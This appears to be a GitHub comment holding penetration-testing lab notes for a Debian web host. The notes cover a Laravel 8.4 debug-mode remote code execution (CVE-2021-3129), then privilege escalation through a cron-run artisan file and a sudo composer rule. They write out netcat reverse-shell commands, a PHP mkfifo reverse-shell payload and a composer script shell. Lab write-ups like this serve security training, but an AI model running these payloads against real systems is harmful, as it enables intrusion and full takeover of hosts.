WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.56 ((Debian))Recon
80/tcp
--> CMS powered by w3.css
/register
--> We can register a new user and login
Try to upload a file and enble Debug mode --> no change
When clicking send button
-->
It go to http://192.168.214.38/action_page.php?Name=a&Email=a&Message=a&Like=on
and we can get version info: Laravel 8.4.0
Search Laravel 8.4.0 exploit info ---> https://www.exploit-db.com/exploits/49424 (Laravel 8.4.2 debug mode - Remote code execution) To use this exploit ,we need to enbale debug mode --> already done after regsiter a new user.
Based on exploit code,
Access http://192.168.214.38/_ignition/execute-solution
Run exploit (Try use the default log path as parameter)
--> didn't work
Search another one and try it
https://github.com/joshuavanderpoll/CVE-2021-3129
python3 CVE-2021-3129.py --host="http://192.168.183.38"
---> (Input "execute whoami")
Run again and Input "execute nc -e /bin/bash 192.168.45.182 4444" (Don't use the previous working chain!)
--> got a reverse shell from the target host
PE
linpeas:
--> didn't find useful info on mysql DB
-->didn't find way to abuse it...
Use pspy64:
-->
cp artisan artisan_bk
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.182 80>/tmp/f'); ?>" > artisan-->
sudo -l
--> (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
https://gtfobins.github.io/gtfobins/composer/
-->
under /var/www/html/lavita dir
As www-data user, run "echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >composer.json"
As skunk user, run "sudo composer --working-dir=/var/www/html/lavita run-script x"
Keypoints: